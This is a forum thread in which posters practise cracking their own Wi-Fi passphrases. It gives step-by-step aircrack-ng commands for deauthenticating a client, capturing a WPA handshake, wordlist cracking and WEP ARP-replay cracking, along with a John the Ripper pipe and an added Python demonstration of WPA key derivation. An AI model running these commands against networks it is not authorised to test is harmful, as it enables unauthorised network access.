
Thread: Am I doing this right

  1. #1
    Join Date: Jan 2010
    Location: Helsinki, Finland

    Question: Am I doing this right


    I'm trying to use aircrack-ng to find out my WLAN passphrase. I know it, but I want to practice it.
    I'm using an Alfa Networks AWUS036H 1000mW USB device. I'm using BT4 beta in VMware.

    1. airmon-ng stop wlan0
    2. airmon-ng start wlan0 -> mon0 (monitor mode)
    It does work also without steps 1 and 2.
    3. airodump-ng mon0 --channel 6 --bssid (AP bssid) -w /tmp/WPA
    In a new terminal:
    4. aireplay-ng -0 1 -a (AP bssid) -c (target mac) mon0
    5. airodump-ng captures the 4-way handshake.
    6. I can stop that capture after ? packets. I waited a few minutes.
    7. Then I copied that WPA-01.cap file to Windows 7, where I used the Aircrack-ng GUI to crack the passphrase.
    8. A wordlist crack found my passphrase, after I added it to that wordlist file.
    My WLAN WPA-PSK passphrase was at the time of that capture salasana121 (=password121).
    I tried to use John the Ripper on BT4 but after 20h I stopped it.

    So am I doing everything needed during that procedure? Where can I find a huge wordlist? This is what I have tried (I used at least that Finnish one).

    Could I use a brute force attack to solve my passphrase?

    ------------------------------------------------------------
    And for WEP passphrases, I did it like this (no clients). Is there a difference if there are any clients?
    1. airmon-ng stop wlan0
    2. airmon-ng start wlan0 -> monitor mode enabled on mon0
    It does not work without steps 1 and 2.
    3. airodump-ng mon0 -w /tmp/WEP --channel 6 --bssid (AP bssid)

    4. aireplay-ng -1 0 -a (AP bssid) mon0

    5. aireplay-ng -3 -b (AP bssid) mon0

    And wait until there are 30 000 packets (the second number from the left).

    6. aircrack-ng /tmp/WEP-01.cap

  2. #2
    Join Date: Jan 2010


    Well, unless your password is in the dictionary file, it's not going to find it.

    Brute force would take millions of years to run through every possible combination on the keyboard.

    Simply put your password in the dictionary and run it with aircrack in BT4, and then you will have proven the vulnerability of WPA.

    Also try airolib-ng to make cracking quicker.
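Added example for the two posts above, not code from the thread or from the aircrack-ng project: it shows what the dictionary phase computes for WPA-PSK (the PBKDF2 pairwise master key that aircrack-ng derives per candidate), why a passphrase absent from the wordlist can never be found by that phase, and how a defender can estimate brute-force resistance from the measured PBKDF2 rate. The SSID "HomeNet" and the four-word wordlist are constructed.

```python
import hashlib
import hmac
import time


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK -> PMK: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def dictionary_check(target_pmk: bytes, ssid: str, wordlist):
    """Return the first candidate whose PMK matches target_pmk, else None.

    Mirrors the shape of a wordlist (-w) run: every candidate costs one full
    PBKDF2 derivation, so the list, not the tool, decides success.
    """
    for cand in wordlist:
        cand = cand.strip()
        if cand and hmac.compare_digest(wpa_pmk(cand, ssid), target_pmk):
            return cand
    return None


def pbkdf2_rate(ssid: str, samples: int = 50) -> float:
    """Measured PMK derivations per second on this host (single core)."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"probe{i}", ssid)  # constructed throwaway candidates
    return samples / (time.perf_counter() - t0)


def brute_force_seconds(alphabet_size: int, length: int, rate: float) -> float:
    """Worst-case seconds to derive a PMK for every passphrase of that shape."""
    return alphabet_size ** length / rate


if __name__ == "__main__":
    SSID = "HomeNet"                       # constructed; stands in for the AP's ESSID
    target = wpa_pmk("salasana121", SSID)  # the passphrase the poster already knows
    words = ["password", "salasana", "salasana121", "qwerty"]  # constructed wordlist
    print("wordlist without the passphrase:", dictionary_check(target, SSID, words[:2]))
    print("wordlist with the passphrase:   ", dictionary_check(target, SSID, words))
    rate = pbkdf2_rate(SSID)
    years = brute_force_seconds(62, 8, rate) / 31_557_600
    print(f"~{rate:.0f} PBKDF2/s here; all 8-char mixed-case alphanumerics: ~{years:.0f} years")
```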

  3. #3
    Join Date: Mar 2010


    I have a somewhat similar question. I'm checking my WPA security and I wanted to try piping the dictionary list through John the Ripper. However, when I ran:

    ./john --wordlist=/mnt/sda/Dictionary/dictionary.txt --rules --stdout | aircrack-ng -e ssid -w - /kismet.dump

    it appears that it just tries an empty dictionary.
    Is there something wrong with the command I'm using?
